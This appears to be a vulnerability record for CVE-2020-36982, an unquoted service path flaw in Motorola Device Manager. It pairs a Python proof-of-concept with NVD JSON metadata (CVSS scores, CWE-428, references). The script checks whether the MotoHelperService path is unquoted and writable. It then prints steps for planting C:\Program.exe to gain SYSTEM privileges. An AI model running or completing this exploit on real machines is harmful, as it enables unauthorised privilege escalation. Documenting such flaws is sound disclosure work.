CVE-2020-36982

# CVE-2020-36982 PoC - Unquoted Service Path in Motorola Device Manager # This PoC demonstrates how to exploit the unquoted service path vulnerability # to gain SYSTEM privileges through the MotoHelperService.exe service import os import sys import subprocess def check_vulnerable_service(): """Check if MotoHelperService.exe has unquoted service path vulnerability""" try: # Query service configuration using sc command result = subprocess.check_output( ['sc', 'qc', 'MotoHelperService'], stderr=subprocess.STDOUT, text=True ) print("[*] MotoHelperService Configuration:") print(result) # Check if BINARY_PATH_NAME contains spaces and no quotes if 'BINARY_PATH_NAME' in result: for line in result.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[*] Service Path: {path}") if ' ' in path and not path.startswith('"'): print("[+] VULNERABLE: Path contains spaces without quotes!") return True return False except Exception as e: print(f"[-] Error checking service: {e}") return False def create_malicious_executable(): """Create a malicious executable to be placed in unquoted path""" # Path where attacker would place malicious executable # Based on the service path, this could be C:\Program.exe or similar malicious_path = r"C:\Program.exe" # Check if we can write to the target location target_dir = os.path.dirname(malicious_path) if os.access(target_dir, os.W_OK): print(f"[+] Can write to {target_dir}") # In real attack, this would be a reverse shell or other malicious code print(f"[*] Attacker would place malicious executable at: {malicious_path}") print("[*] When service restarts, the malicious code will execute as SYSTEM") else: print(f"[-] Cannot write to {target_dir}") def main(): print("=" * 60) print("CVE-2020-36982 - Motorola Device Manager Unquoted Service Path") print("=" * 60) print("\n[1] Checking if MotoHelperService is vulnerable...") is_vulnerable = check_vulnerable_service() if is_vulnerable: print("\n[2] Analyzing exploitation path...") create_malicious_executable() print("\n[*] Exploitation Steps:") print(" 1. Create a malicious executable (e.g., Program.exe)") print(" 2. Place it in an unquoted path segment (e.g., C:\\Program.exe)") print(" 3. Wait for service restart or trigger service restart") print(" 4. Malicious code executes with SYSTEM privileges") else: print("\n[-] Service not found or not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2020-36982", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:11.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Motorola Device Manager 2.5.4 contains an unquoted service path vulnerability in the MotoHelperService.exe service that allows local users to potentially inject malicious code. Attackers can exploit the unquoted path in the service configuration to execute arbitrary code with elevated system privileges during service startup."}, {"lang": "es", "value": "Motorola Device Manager 2.5.4 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio MotoHelperService.exe que permite a los usuarios locales inyectar potencialmente código malicioso. Los atacantes pueden explotar la ruta sin comillas en la configuración del servicio para ejecutar código arbitrario con privilegios de sistema elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://motorola-device-manager.programas-gratis.net/gracias", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49012", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/motorola-device-manager-motohelperserviceexe-unquoted-service-path", "source": "[email protected]"}]}}